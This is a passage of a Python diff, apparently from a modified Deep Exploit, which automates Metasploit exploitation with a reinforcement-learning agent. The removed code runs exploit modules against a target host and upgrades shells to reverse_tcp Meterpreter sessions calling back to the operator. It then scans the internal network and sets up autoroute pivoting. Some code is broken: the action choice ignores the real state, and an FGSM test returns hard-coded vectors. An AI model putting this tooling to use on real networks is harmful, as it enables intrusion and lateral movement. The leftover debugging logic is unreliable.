- if len(port_list) == 0:
- self.util.print_message(WARNING, 'No open port.')
- self.util.print_message(WARNING, 'Shutdown Deep Exploit...')
- self.client.termination(self.client.console_id)
- exit(1)
-
- # Update com_port_list.
- com_port_list = port_list
-
- # Get OS name from XML file.
- some_os = bs.find_all('osmatch')
- os_name = 'unknown'
- for obj_os in some_os:
- for obj_child in obj_os.contents:
- if obj_child.name == 'osclass' and 'osfamily' in obj_child.attrs:
- os_name = (obj_child.attrs['osfamily']).lower()
- break
-
- # Set OS to state.
- for (idx, os_type) in enumerate(self.os_type):
- if os_name in os_type:
- self.os_real = idx
- else:
- # Get target host information from local file.
- saved_file = os.path.join(self.data_path, 'target_info_' + rhost + '.json')
- self.util.print_message(OK, 'Loaded target tree from : {}'.format(saved_file))
- fin = codecs.open(saved_file, 'r', 'utf-8')
- target_tree = json.loads(fin.read().replace('\0', ''))
- fin.close()
- key_list = list(target_tree.keys())
- for key in key_list[2:]:
- port_list.append(str(key))
-
- # Update com_port_list.
- com_port_list = port_list
-
- return port_list, proto_list, info_list
-
- # Get Exploit module list.
- def get_exploit_list(self):
- self.util.print_message(NOTE, 'Get exploit list.')
- all_exploit_list = []
- if os.path.exists(os.path.join(self.data_path, 'exploit_list.csv')) is False:
- self.util.print_message(OK, 'Loading exploit list from Metasploit.')
-
- # Get Exploit module list.
- all_exploit_list = []
- exploit_candidate_list = self.client.get_module_list('exploit')
- for idx, exploit in enumerate(exploit_candidate_list):
- module_info = self.client.get_module_info('exploit', exploit)
- time.sleep(0.1)
- if "error" in module_info:
- continue
-
- try:
- rank = module_info[b'rank'].decode('utf-8')
- if rank in {'excellent', 'great', 'good'}:
- all_exploit_list.append(exploit)
- self.util.print_message(OK, '{}/{} Loaded exploit: {}'.format(str(idx + 1),
- len(exploit_candidate_list),
- exploit))
- else:
- self.util.print_message(WARNING, '{}/{} {} module is danger (rank: {}). Can\'t load.'
- .format(str(idx + 1), len(exploit_candidate_list), exploit, rank))
- except Exception as e:
- self.util.print_exception(e, 'Failed: module.info')
- continue
- exit(1)
-
- # Save Exploit module list to local file.
- self.util.print_message(OK, 'Total loaded exploit module: {}'.format(str(len(all_exploit_list))))
- fout = codecs.open(os.path.join(self.data_path, 'exploit_list.csv'), 'w', 'utf-8')
- for item in all_exploit_list:
- fout.write(item + '\n')
- fout.close()
- self.util.print_message(OK, 'Saved exploit list.')
- else:
- # Get exploit module list from local file.
- local_file = os.path.join(self.data_path, 'exploit_list.csv')
- self.util.print_message(OK, 'Loaded exploit list from : {}'.format(local_file))
- fin = codecs.open(local_file, 'r', 'utf-8')
- for item in fin:
- all_exploit_list.append(item.rstrip('\n'))
- fin.close()
- return all_exploit_list
-
- # Get payload list.
- def get_payload_list(self, module_name='', target_num=''):
- self.util.print_message(NOTE, 'Get payload list.')
- all_payload_list = []
- if os.path.exists(os.path.join(self.data_path, 'payload_list.csv')) is False or module_name != '':
- self.util.print_message(OK, 'Loading payload list from Metasploit.')
-
- # Get payload list.
- payload_list = []
- if module_name == '':
- # Get all Payloads.
- payload_list = self.client.get_module_list('payload')
-
- # Save payload list to local file.
- fout = codecs.open(os.path.join(self.data_path, 'payload_list.csv'), 'w', 'utf-8')
- for idx, item in enumerate(payload_list):
- time.sleep(0.1)
- self.util.print_message(OK, '{}/{} Loaded payload: {}'.format(str(idx + 1),
- len(payload_list),
- item))
- fout.write(item + '\n')
- fout.close()
- self.util.print_message(OK, 'Saved payload list.')
- elif target_num == '':
- # Get payload that compatible exploit module.
- payload_list = self.client.get_compatible_payload_list(module_name)
- else:
- # Get payload that compatible target.
- payload_list = self.client.get_target_compatible_payload_list(module_name, target_num)
- else:
- # Get payload list from local file.
- local_file = os.path.join(self.data_path, 'payload_list.csv')
- self.util.print_message(OK, 'Loaded payload list from : {}'.format(local_file))
- payload_list = []
- fin = codecs.open(local_file, 'r', 'utf-8')
- for item in fin:
- payload_list.append(item.rstrip('\n'))
- fin.close()
- return payload_list
-
- # Reset state (s).
- def reset_state(self, exploit_tree, target_tree):
- # Randomly select target port number.
- port_num = str(com_port_list[random.randint(0, len(com_port_list) - 1)])
- service_name = target_tree[port_num]['prod_name']
- if service_name == 'unknown':
- return True, None, None, None, None
-
- # Initialize state.
- self.state = []
-
- # Set os type to state.
- self.os_real = target_tree['os_type']
- self.state.insert(ST_OS_TYPE, target_tree['os_type'])
-
-
-
- self.normalization(ST_OS_TYPE)
-
- # Set product name (index) to state.
- for (idx, service) in enumerate(self.service_list):
- if service == service_name:
- self.state.insert(ST_SERV_NAME, idx)
- break
- self.normalization(ST_SERV_NAME)
-
- # Set version to state.
- self.state.insert(ST_SERV_VER, target_tree[port_num]['version'])
-
- # Set exploit module type (index) to state.
- module_list = target_tree[port_num]['exploit']
-
- # Randomly select exploit module.
- module_name = ''
- module_info = []
- while True:
- module_name = module_list[random.randint(0, len(module_list) - 1)]
- for (idx, exploit) in enumerate(com_exploit_list):
- exploit = 'exploit/' + exploit
- if exploit == module_name:
- self.state.insert(ST_MODULE, idx)
- break
- self.normalization(ST_MODULE)
- break
-
- # Randomly select target.
- module_name = module_name[8:]
- target_list = exploit_tree[module_name]['target_list']
- targets_num = target_list[random.randint(0, len(target_list) - 1)]
- self.state.insert(ST_TARGET, int(targets_num))
-
- # Set exploit stage to state.
- # self.state.insert(ST_STAGE, S_NORMAL)
-
- # Set target information for display.
- target_info = {'protocol': target_tree[port_num]['protocol'],
- 'target_path': target_tree[port_num]['target_path'], 'prod_name': service_name,
- 'version': target_tree[port_num]['version'], 'exploit': module_name}
- if com_indicate_flag:
- port_num = target_tree['origin_port']
- target_info['port'] = str(port_num)
-
- return False, self.state, exploit_tree[module_name]['targets'][targets_num], target_list, target_info
-
- # Get state (s).
- def get_state(self, exploit_tree, target_tree, port_num, exploit, target):
- # Get product name.
- service_name = target_tree[port_num]['prod_name']
- if service_name == 'unknown':
- return True, None, None, None
-
- # Initialize state.
- self.state = []
-
- # Set os type to state.
- self.os_real = target_tree['os_type']
- self.state.insert(ST_OS_TYPE, target_tree['os_type'])
-
- # print("状态为")
- # print(service_name)
-
- self.normalization(ST_OS_TYPE)
-
- # Set product name (index) to state.
- for (idx, service) in enumerate(self.service_list):
- if service == service_name:
- self.state.insert(ST_SERV_NAME, idx)
- break
- self.normalization(ST_SERV_NAME)
-
- # Set version to state.
- self.state.insert(ST_SERV_VER, target_tree[port_num]['version'])
-
- # Select exploit module (index).
- for (idx, temp_exploit) in enumerate(com_exploit_list):
- temp_exploit = 'exploit/' + temp_exploit
- if exploit == temp_exploit:
- self.state.insert(ST_MODULE, idx)
- break
- self.normalization(ST_MODULE)
-
- # Select target.
- self.state.insert(ST_TARGET, int(target))
-
- # Set exploit stage to state.
- # self.state.insert(ST_STAGE, S_NORMAL)
-
- # Set target information for display.
- target_info = {'protocol': target_tree[port_num]['protocol'],
- 'target_path': target_tree[port_num]['target_path'],
- 'prod_name': service_name, 'version': target_tree[port_num]['version'],
- 'exploit': exploit[8:], 'target': target}
- if com_indicate_flag:
- port_num = target_tree['origin_port']
- target_info['port'] = str(port_num)
-
- return False, self.state, exploit_tree[exploit[8:]]['targets'][target], target_info
-
- # Get available payload list (convert from string to number).
- def get_available_actions(self, payload_list):
- payload_num_list = []
- for self_payload in payload_list:
- for (idx, payload) in enumerate(com_payload_list):
- if payload == self_payload:
- payload_num_list.append(idx)
- break
- return payload_num_list
-
- # Show banner of successfully exploitation.
- def show_banner_bingo(self, prod_name, exploit, payload, sess_type, delay_time=2.0):
- banner = u"""
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- ██████╗ ██╗███╗ ██╗ ██████╗ ██████╗ ██╗██╗██╗
- ██╔══██╗██║████╗ ██║██╔════╝ ██╔═══██╗██║██║██║
- ██████╔╝██║██╔██╗ ██║██║ ███╗██║ ██║██║██║██║
- ██╔══██╗██║██║╚██╗██║██║ ██║██║ ██║╚═╝╚═╝╚═╝
- ██████╔╝██║██║ ╚████║╚██████╔╝╚██████╔╝██╗██╗██╗
- ╚═════╝ ╚═╝╚═╝ ╚═══╝ ╚═════╝ ╚═════╝ ╚═╝╚═╝╚═╝
- ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
- """ + prod_name + ' ' + exploit + ' ' + payload + ' ' + sess_type + '\n'
- self.util.print_message(NONE, banner)
- time.sleep(delay_time)
-
- # Set Metasploit options.
- def set_options(self, target_info, target, selected_payload, exploit_tree):
- options = exploit_tree[target_info['exploit']]['options']
- key_list = options.keys()
- option = {}
- for key in key_list:
- if options[key]['required'] is True:
- sub_key_list = options[key].keys()
- if 'default' in sub_key_list:
- # If "user_specify" is not null, set "user_specify" value to the key.
- if options[key]['user_specify'] == '':
- option[key] = options[key]['default']
- else:
- option[key] = options[key]['user_specify']
- else:
- option[key] = '0'
-
- # Set target path/uri/dir etc.
- if len([s for s in self.path_collection if s in key.lower()]) != 0:
- option[key] = target_info['target_path']
-
- option['RHOST'] = self.rhost
- if self.port_div_symbol in target_info['port']:
- tmp_port = target_info['port'].split(self.port_div_symbol)
- option['RPORT'] = int(tmp_port[0])
- else:
- option['RPORT'] = int(target_info['port'])
- option['TARGET'] = int(target)
- if selected_payload != '':
- option['PAYLOAD'] = selected_payload
- return option
-
- # Execute exploit.
- def execute_exploit(self, action, thread_name, thread_type, target_list, target_info, step, exploit_tree, frame=0):
- # Set target.
- target = ''
- if thread_type == 'learning':
- target = str(self.state[ST_TARGET])
- else:
- # If testing, 'target_list' is target number (not list).
- target = target_list
- # If trial exceed maximum number of trials, finish trial at current episode.
- if step > self.max_attempt - 1:
- return self.state, None, True, {}
-
- # Set payload.
- selected_payload = ''
- if action != 'no payload':
- selected_payload = com_payload_list[action]
- else:
- # No payload
- selected_payload = ''
-
- # Set options.
- option = self.set_options(target_info, target, selected_payload, exploit_tree)
-
- # Execute exploit.
- reward = 0
- message = ''
- session_list = {}
- done = False
- job_id, uuid = self.client.execute_module('exploit', target_info['exploit'], option)
- if uuid is not None:
- # Check status of running module.
- _ = self.check_running_module(job_id, uuid)
- sessions = self.client.get_session_list()
- key_list = sessions.keys()
- if len(key_list) != 0:
- # Probably successfully of exploitation (but unsettled).
- for key in key_list:
- exploit_uuid = sessions[key][b'exploit_uuid'].decode('utf-8')
- if uuid == exploit_uuid:
- # Successfully of exploitation.
- session_id = int(key)
- session_type = sessions[key][b'type'].decode('utf-8')
- session_port = str(sessions[key][b'session_port'])
- session_exploit = sessions[key][b'via_exploit'].decode('utf-8')
- session_payload = sessions[key][b'via_payload'].decode('utf-8')
- module_info = self.client.get_module_info('exploit', session_exploit)
-
- # Checking feasibility of post-exploitation.
- # status, server_job_id, new_session_id = self.check_post_exploit(session_id, session_type)
- # status = self.check_payload_type(session_payload, session_type)
- status = True
-
- if status:
- # Successful of post-exploitation.
- reward = R_GREAT
- done = True
- message = 'bingo!! '
-
- # Display banner.
- self.show_banner_bingo(target_info['prod_name'],
- session_exploit,
- session_payload,
- session_type)
- else:
- # Failure of post-exploitation.
- reward = R_GOOD
- message = 'misfire '
-
- # Gather reporting items.
- vuln_name = module_info[b'name'].decode('utf-8')
- description = module_info[b'description'].decode('utf-8')
- ref_list = module_info[b'references']
- reference = ''
- for item in ref_list:
- reference += '[' + item[0].decode('utf-8') + ']' + '@' + item[1].decode('utf-8') + '@@'
-
- # Save reporting item for report.
- if thread_type == 'learning':
- with codecs.open(os.path.join(self.report_train_path,
- thread_name + '.csv'), 'a', 'utf-8') as fout:
- bingo = [self.util.get_current_date(),
- self.rhost,
- session_port,
- target_info['protocol'],
- target_info['prod_name'],
- str(target_info['version']),
- vuln_name,
- description,
- session_type,
- session_exploit,
- target,
- session_payload,
- reference]
- writer = csv.writer(fout)
- writer.writerow(bingo)
- else:
- print("开始写入")
- with codecs.open(os.path.join(self.report_test_path,
- thread_name + '.csv'), 'a', 'utf-8') as fout:
- bingo = [self.util.get_current_date(),
- self.rhost,
- session_port,
- self.source_host,
- target_info['protocol'],
- target_info['prod_name'],
- str(target_info['version']),
- vuln_name,
- description,
- session_type,
- session_exploit,
- target,
- session_payload,
- reference]
- writer = csv.writer(fout)
- writer.writerow(bingo)
-
- # Shutdown multi-handler for post-exploitation.
- # if server_job_id is not None:
- # self.client.stop_job(server_job_id)
-
- # Disconnect session.
- if thread_type == 'learning':
- self.client.stop_session(session_id)
- # self.client.stop_session(new_session_id)
- self.client.stop_meterpreter_session(session_id)
- # self.client.stop_meterpreter_session(new_session_id)
- # Create session list for post-exploitation.
- else:
- # self.client.stop_session(new_session_id)
- # self.client.stop_meterpreter_session(new_session_id)
- session_list['id'] = session_id
- session_list['type'] = session_type
- session_list['port'] = session_port
- session_list['exploit'] = session_exploit
- session_list['target'] = target
- session_list['payload'] = session_payload
- break
- else:
- # Failure exploitation.
- reward = R_BAD
- message = 'failure '
- else:
- # Failure exploitation.
- reward = R_BAD
- message = 'failure '
- else:
- # Time out or internal error of Metasploit.
- done = True
- reward = R_BAD
- message = 'time out'
-
- # Output result to console.
- if thread_type == 'learning':
- self.util.print_message(OK, '{0:04d}/{1:04d} : {2:03d}/{3:03d} {4} reward:{5} {6} {7} ({8}/{9}) '
- '{10} | {11} | {12} | {13}'.format(frame,
- MAX_TRAIN_NUM,
- step,
- MAX_STEPS,
- thread_name,
- str(reward),
- message,
- self.rhost,
- target_info['protocol'],
- target_info['port'],
- target_info['prod_name'],
- target_info['exploit'],
- selected_payload,
- target))
- else:
- self.util.print_message(OK, '{0}/{1} {2} {3} ({4}/{5}) '
- '{6} | {7} | {8} | {9}'.format(step+1,
- self.max_attempt,
- message,
- self.rhost,
- target_info['protocol'],
- target_info['port'],
- target_info['prod_name'],
- target_info['exploit'],
- selected_payload,
- target))
-
- # Set next stage of exploitation.
- targets_num = 0
- if thread_type == 'learning' and len(target_list) != 0:
- targets_num = random.randint(0, len(target_list) - 1)
- self.state[ST_TARGET] = targets_num
- '''
- if thread_type == 'learning' and len(target_list) != 0:
- if reward == R_BAD and self.state[ST_STAGE] == S_NORMAL:
- # Change status of target.
- self.state[ST_TARGET] = random.randint(0, len(target_list) - 1)
- elif reward == R_GOOD:
- # Change status of exploitation stage (Fix target).
- self.state[ST_STAGE] = S_EXPLOIT
- else:
- # Change status of post-exploitation stage (Goal).
- self.state[ST_STAGE] = S_PEXPLOIT
- '''
-
- return self.state, reward, done, session_list
-
- # Check possibility of post exploit.
- def check_post_exploit(self, session_id, session_type):
- new_session_id = 0
- status = False
- job_id = None
- if session_type == 'shell' or session_type == 'powershell':
- # Upgrade session from shell to meterpreter.
- upgrade_result, job_id, lport = self.upgrade_shell(session_id)
- if upgrade_result == 'success':
- sessions = self.client.get_session_list()
- session_list = list(sessions.keys())
- for sess_idx in session_list:
- if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter':
- status = True
- new_session_id = sess_idx
- break
- else:
- status = False
- elif session_type == 'meterpreter':
- status = True
- else:
- status = False
- return status, job_id, new_session_id
-
- # Check payload type.
- def check_payload_type(self, session_payload, session_type):
- status = None
- if session_type == 'shell' or session_type == 'powershell':
- # Check type: singles, stagers, stages
- if session_payload.count('/') > 1:
- # Stagers, Stages.
- status = True
- else:
- # Singles.
- status = False
- elif session_type == 'meterpreter':
- status = True
- else:
- status = False
- return status
-
- # Execute post exploit.
- def execute_post_exploit(self, session_id, session_type):
- internal_ip_list = []
- if session_type == 'shell' or session_type == 'powershell':
- # Upgrade session from shell to meterpreter.
- upgrade_result, _, _ = self.upgrade_shell(session_id)
- if upgrade_result == 'success':
- sessions = self.client.get_session_list()
- session_list = list(sessions.keys())
- for sess_idx in session_list:
- if session_id < sess_idx and sessions[sess_idx][b'type'].lower() == b'meterpreter':
- self.util.print_message(NOTE, 'Successful: Upgrade.')
- session_id = sess_idx
-
- # Search other servers in internal network.
- internal_ip_list, _ = self.get_internal_ip(session_id)
- if len(internal_ip_list) == 0:
- self.util.print_message(WARNING, 'Internal server is not found.')
- else:
- # Pivoting.
- self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list))
- self.set_pivoting(session_id, internal_ip_list)
- break
- else:
- self.util.print_message(WARNING, 'Failure: Upgrade session from shell to meterpreter.')
- elif session_type == 'meterpreter':
- # Search other servers in internal network.
- internal_ip_list, _ = self.get_internal_ip(session_id)
- if len(internal_ip_list) == 0:
- self.util.print_message(WARNING, 'Internal server is not found.')
- else:
- # Pivoting.
- self.util.print_message(OK, 'Internal server list.\n{}'.format(internal_ip_list))
- self.set_pivoting(session_id, internal_ip_list)
- else:
- self.util.print_message(WARNING, 'Unknown session type: {}.'.format(session_type))
- return internal_ip_list
-
- # Upgrade session from shell to meterpreter.
- def upgrade_shell(self, session_id):
- # Upgrade shell session to meterpreter.
- self.util.print_message(NOTE, 'Upgrade session from shell to meterpreter.')
- payload = ''
- # TODO: examine payloads each OS systems.
- if self.os_real == 0:
- payload = 'windows/meterpreter/reverse_tcp'
- elif self.os_real == 3:
- payload = 'osx/x64/meterpreter_reverse_tcp'
- else:
- payload = 'linux/x86/meterpreter_reverse_tcp'
-
- # Launch multi handler.
- module = 'exploit/multi/handler'
- lport = random.randint(10001, 65535)
- option = {'LHOST': self.lhost, 'LPORT': lport, 'PAYLOAD': payload, 'TARGET': 0}
- job_id, uuid = self.client.execute_module('exploit', module, option)
- time.sleep(0.5)
- if uuid is None:
- self.util.print_message(FAIL, 'Failure executing module: {}'.format(module))
- return 'failure', job_id, lport
-
- # Execute upgrade.
- status = self.client.upgrade_shell_session(session_id, self.lhost, lport)
- return status, job_id, lport
-
- # Check status of running module.
- def check_running_module(self, job_id, uuid):
- # Waiting job to finish.
- time_count = 0
- while True:
- job_id_list = self.client.get_job_list()
- if job_id in job_id_list:
- time.sleep(1)
- else:
- return True
- if self.timeout == time_count:
- self.client.stop_job(str(job_id))
- self.util.print_message(WARNING, 'Timeout: job_id={}, uuid={}'.format(job_id, uuid))
- return False
- time_count += 1
-
- # Get internal ip addresses.
- def get_internal_ip(self, session_id):
- # Execute "arp" of Meterpreter command.
- self.util.print_message(OK, 'Searching internal servers...')
- cmd = 'arp\n'
- _ = self.client.execute_meterpreter(session_id, cmd)
- time.sleep(3.0)
- data = self.client.get_meterpreter_result(session_id)
- if (data is None) or ('unknown command' in data.lower()):
- self.util.print_message(FAIL, 'Failed: Get meterpreter result')
- return [], False
- self.util.print_message(OK, 'Result of arp: \n{}'.format(data))
- regex_pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}).*[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}:[a-z0-9]{2}'
- temp_list = self.cutting_strings(regex_pattern, data)
- internal_ip_list = []
- for ip_addr in temp_list:
- if ip_addr != self.lhost:
- internal_ip_list.append(ip_addr)
- return list(set(internal_ip_list)), True
-
- # Get subnet masks.
- def get_subnet(self, session_id, internal_ip):
- cmd = 'run get_local_subnets\n'
- _ = self.client.execute_meterpreter(session_id, cmd)
- time.sleep(3.0)
- data = self.client.get_meterpreter_result(session_id)
- if data is not None:
- self.util.print_message(OK, 'Result of get_local_subnets: \n{}'.format(data))
- regex_pattern = r'(\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}/\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})'
- temp_subnet = self.cutting_strings(regex_pattern, data)
- try:
- subnets = temp_subnet[0].split('/')
- return [subnets[0], subnets[1]]
- except Exception as e:
- self.util.print_exception(e, 'Failed: {}'.format(cmd))
- return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0']
- else:
- self.util.print_message(WARNING, '"{}" is failure.'.format(cmd))
- return ['.'.join(internal_ip.split('.')[:3]) + '.0', '255.255.255.0']
-
- # Set pivoting using autoroute.
- def set_pivoting(self, session_id, ip_list):
- # Get subnet of target internal network.
- temp_subnet = []
- for internal_ip in ip_list:
- # Execute an autoroute command.
- temp_subnet.append(self.get_subnet(session_id, internal_ip))
-
- # Execute autoroute.
- for subnet in list(map(list, set(map(tuple, temp_subnet)))):
- cmd = 'run autoroute -s ' + subnet[0] + ' ' + subnet[1] + '\n'
- _ = self.client.execute_meterpreter(session_id, cmd)
- time.sleep(3.0)
- _ = self.client.execute_meterpreter(session_id, 'run autoroute -p\n')
-
-
- # Constants of LocalBrain
- MIN_BATCH = 5
- LOSS_V = .5 # v loss coefficient
- LOSS_ENTROPY = .01 # entropy coefficient
- LEARNING_RATE = 5e-3
- RMSPropDecaly = 0.99
-
- # Params of advantage (Bellman equation)
- GAMMA = 0.99
- N_STEP_RETURN = 5
- GAMMA_N = GAMMA ** N_STEP_RETURN
-
- TRAIN_WORKERS = 10 # Thread number of learning.
- TEST_WORKER = 1 # Thread number of testing (default 1)
- MAX_STEPS = 20 # Maximum step number.
- MAX_TRAIN_NUM = 5000 # Learning number of each thread.
- Tmax = 5 # Updating step period of each thread.
-
- # Params of epsilon greedy
- EPS_START = 0.5
- EPS_END = 0.0
-
-
- #%%
- # ParameterServer
- class ParameterServer:
- def __init__(self):
- # Identify by name to weights by the thread name (Name Space).
- with tf.variable_scope("parameter_server"):
- # Define neural network.
- self.model = self._build_model()
-
- # Declare server params.
- self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope="parameter_server")
- # Define optimizer.
- self.optimizer = tf.train.RMSPropOptimizer(LEARNING_RATE, RMSPropDecaly)
-
- # Define neural network.
- def _build_model(self):
- l_input = Input(batch_shape=(None, NUM_STATES))
- l_dense1 = Dense(50, activation='relu')(l_input)
- l_dense2 = Dense(100, activation='relu')(l_dense1)
- l_dense3 = Dense(200, activation='relu')(l_dense2)
- l_dense4 = Dense(400, activation='relu')(l_dense3)
- out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense4)
- out_value = Dense(1, activation='linear')(l_dense4)
- model = Model(inputs=[l_input], outputs=[out_actions, out_value])
- return model
-
-
- # LocalBrain
- class LocalBrain:
- def __init__(self, name, parameter_server):
- self.util = Utilty()
- self.model_old = self._build_model()
- with tf.name_scope(name):
- # s, a, r, s', s' terminal mask
- self.train_queue = [[], [], [], [], []]
- K.set_session(SESS)
-
- # Define neural network.
- self.model = self._build_model()
- # Define learning method.
- self._build_graph(name, parameter_server)
-
-
- # Define neural network.
- def _build_model(self):
- l_input = Input(batch_shape=(None, NUM_STATES))
- l_dense1 = Dense(50, activation='relu')(l_input)
- l_dense2 = Dense(100, activation='relu')(l_dense1)
- l_dense3 = Dense(200, activation='relu')(l_dense2)
- l_dense4 = Dense(400, activation='relu')(l_dense3)
- out_actions = Dense(NUM_ACTIONS, activation='softmax')(l_dense4)
- # out_actions = Dense(NUM_ACTIONS)(l_dense4)
- out_value = Dense(1, activation='linear')(l_dense4)
- model = Model(inputs=[l_input], outputs=[out_actions, out_value])
- # Have to initialize before threading
- model._make_predict_function()
- return model
-
- # Define learning method by TensorFlow.
- def _build_graph(self, name, parameter_server):
- self.s_t = tf.placeholder(tf.float32, shape=(None, NUM_STATES))
- self.a_t = tf.placeholder(tf.float32, shape=(None, NUM_ACTIONS))
-
- # Not immediate, but discounted n step reward
- self.r_t = tf.placeholder(tf.float32, shape=(None, 1))
-
- # 模型之间的更新
- p_old, v_old = self.model_old(self.s_t)
- self.model_old.set_weights(self.model.get_weights())
-
- p, v = self.model(self.s_t)
-
- ratio = p / (p_old + 1e-5)
- surr = ratio * self.a_t
-
- # Define loss function.
- log_prob = tf.log(tf.reduce_sum(surr, axis=1, keepdims=True) + 1e-10)
- advantage = self.r_t - v
- loss_policy = - log_prob * tf.stop_gradient(advantage)
- # Minimize value error
- loss_value = LOSS_V * tf.square(advantage)
- # Maximize entropy (regularization)
- entropy = LOSS_ENTROPY * tf.reduce_sum(p * tf.log(p + 1e-10), axis=1, keepdims=True)
- self.loss_critic = loss_policy
- self.loss_total = tf.reduce_mean( loss_value + entropy)
-
- self.loss_adv = - tf.losses.sigmoid_cross_entropy(p, self.a_t)
-
- self.grads_adv = K.gradients(self.loss_adv, self.s_t)
-
- # epison = 0.1
- self.s_t_adv = self.s_t + tf.sign(self.grads_adv)
-
-
- # Define weight.
- self.weights_params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope=name)
- # Define grads.
- self.grads_critic = tf.gradients(self.loss_critic, self.weights_params)
- self.grads = tf.gradients(self.loss_total, self.weights_params)
- # Define updating weight of ParameterServe
- self.update_critic_weight_params = \
- parameter_server.optimizer.apply_gradients(
- zip(self.grads_critic, parameter_server.weights_params))
- self.update_global_weight_params = \
- parameter_server.optimizer.apply_gradients(zip(self.grads, parameter_server.weights_params))
-
- # Define copying weight of ParameterServer to LocalBrain.
- self.pull_global_weight_params = [l_p.assign(g_p)
- for l_p, g_p in zip(self.weights_params, parameter_server.weights_params)]
-
- # Define copying weight of LocalBrain to ParameterServer.
- self.push_local_weight_params = [g_p.assign(l_p)
- for g_p, l_p in zip(parameter_server.weights_params, self.weights_params)]
-
- # Pull ParameterServer weight to local thread.
- def pull_parameter_server(self):
- SESS.run(self.pull_global_weight_params)
-
- # Push local thread weight to ParameterServer.
- def push_parameter_server(self):
- SESS.run(self.push_local_weight_params)
-
- # Updating weight using grads of LocalBrain (learning).
- def update_parameter_server(self):
- if len(self.train_queue[0]) < MIN_BATCH:
- return
-
- self.util.print_message(NOTE, 'Update LocalBrain weight to ParameterServer.')
- s, a, r, s_, s_mask = self.train_queue
- self.train_queue = [[], [], [], [], []]
- s = np.vstack(s)
- a = np.vstack(a)
- r = np.vstack(r)
- s_ = np.vstack(s_)
- s_mask = np.vstack(s_mask)
- _, v = self.model.predict(s_)
-
- # Set v to 0 where s_ is terminal state
- r = r + GAMMA_N * v * s_mask
- feed_dict = {self.s_t: s, self.a_t: a, self.r_t: r} # data of updating weight.
-
- SESS.run(self.update_critic_weight_params,
- feed_dict) # Update ParameterServer weight.
-
- SESS.run(self.update_global_weight_params, feed_dict) # Update ParameterServer weight.
-
-
-
-
-
-
-
- # Return probability of action usin state (s).
- def predict_p(self, s):
- p, v = self.model.predict(s)
- return p
-
- def fgsm_attack(self,s):
- p, v = self.model.predict(s)
-
-
- feed_dict = {self.s_t: s,self.a_t:p} # data of updating weight.
-
- adv = SESS.run(self.s_t_adv,
- feed_dict) # Update ParameterServer weight.
-
- adv = [1,1,1,1,1]
-
- adv = np.reshape(adv,[1,5])
- p_new, v_new = self.model.predict(adv)
-
- adv = [-110,-150, -150, -3000, -5520]
- print(np.argmax(p_new))
-
- adv = np.reshape(adv, [1, 5])
- p_new, v_new = self.model.predict(adv)
- print(np.argmax(p_new))
- # print(p_new[0][33])
-
- return p_new
-
-
-
-
- def train_push(self, s, a, r, s_):
- self.train_queue[0].append(s)
- self.train_queue[1].append(a)
- self.train_queue[2].append(r)
-
- if s_ is None:
- self.train_queue[3].append(NONE_STATE)
- self.train_queue[4].append(0.)
- else:
- self.train_queue[3].append(s_)
- self.train_queue[4].append(1.)
-
-
- # Agent
- class Agent:
- def __init__(self, name, parameter_server):
- self.brain = LocalBrain(name, parameter_server)
- self.memory = [] # Memory of s,a,r,s_
- self.R = 0. # Time discounted total reward.
-
- def act(self, s, available_action_list, eps_steps):
- # Decide action using epsilon greedy.
- if frames >= eps_steps:
- eps = EPS_END
- else:
- # Linearly interpolate
- eps = EPS_START + frames * (EPS_END - EPS_START) / eps_steps
-
- if random.random() < eps:
- # Randomly select action.
- if len(available_action_list) != 0:
- return available_action_list[random.randint(0, len(available_action_list) - 1)], None, None
- else:
- return 'no payload', None, None
- else:
- # Select action according to probability p[0] (greedy).
- s = np.array([s])
-
- adv = [-110, -150, -150, -3000, -5520]
-
- # print("前")
- # adv = np.reshape(adv, [1, 5])
-
- # p = self.brain.fgsm_attack(s)
-
-
- p = self.brain.predict_p(s)
-
- # print(np.argsort(-p))
-
-
- if len(available_action_list) != 0:
- prob = []
- for action in available_action_list:
- prob.append([action, p[0][action]])
- prob.sort(key=lambda s: -s[1])
- # print("前")
- # print(prob[0][0])
- # return prob[0][0], prob[0][1], prob
-
- # print("后")
-
- adv = [0, 0, 0, 0, 0]
-
- adv = np.reshape(adv, [1, 5])
- # print(np.argsort(-p))
-
- # p = self.brain.fgsm_attack(s)
-
- p = self.brain.predict_p(adv)
-
- if len(available_action_list) != 0:
- prob = []
- for action in available_action_list:
- prob.append([action, p[0][action]])
- prob.sort(key=lambda s: -s[1])
- # print("后")
- # print(prob[0][0])
- return prob[0][0], prob[0][1], prob
-
-
-
- else:
- return 'no payload', p[0][len(p[0]) - 1], None
-
- # Push s,a,r,s considering advantage to LocalBrain.
- def advantage_push_local_brain(self, s, a, r, s_):
- def get_sample(memory, n):
- s, a, _, _ = memory[0]
- _, _, _, s_ = memory[n - 1]
- return s, a, self.R, s_
-
- # Create a_cats (one-hot encoding)
- a_cats = np.zeros(NUM_ACTIONS)
- a_cats[a] = 1
- self.memory.append((s, a_cats, r, s_))
-
- # Calculate R using previous time discounted total reward.
- self.R = (self.R + r * GAMMA_N) / GAMMA
-
- # Input experience considering advantage to LocalBrain.
- if s_ is None:
- while len(self.memory) > 0:
- n = len(self.memory)
- s, a, r, s_ = get_sample(self.memory, n)
- self.brain.train_push(s, a, r, s_)
- self.R = (self.R - self.memory[0][2]) / GAMMA
- self.memory.pop(0)
-
- self.R = 0
-
- if len(self.memory) >= N_STEP_RETURN:
- s, a, r, s_ = get_sample(self.memory, N_STEP_RETURN)
- self.brain.train_push(s, a, r, s_)
- self.R = self.R - self.memory[0][2]
- self.memory.pop(0)
-
-
- # Environment.
- class Environment:
- total_reward_vec = np.zeros(10)
- count_trial_each_thread = 0
-
- def __init__(self, name, thread_type, parameter_server, rhost):
- self.name = name
- self.thread_type = thread_type
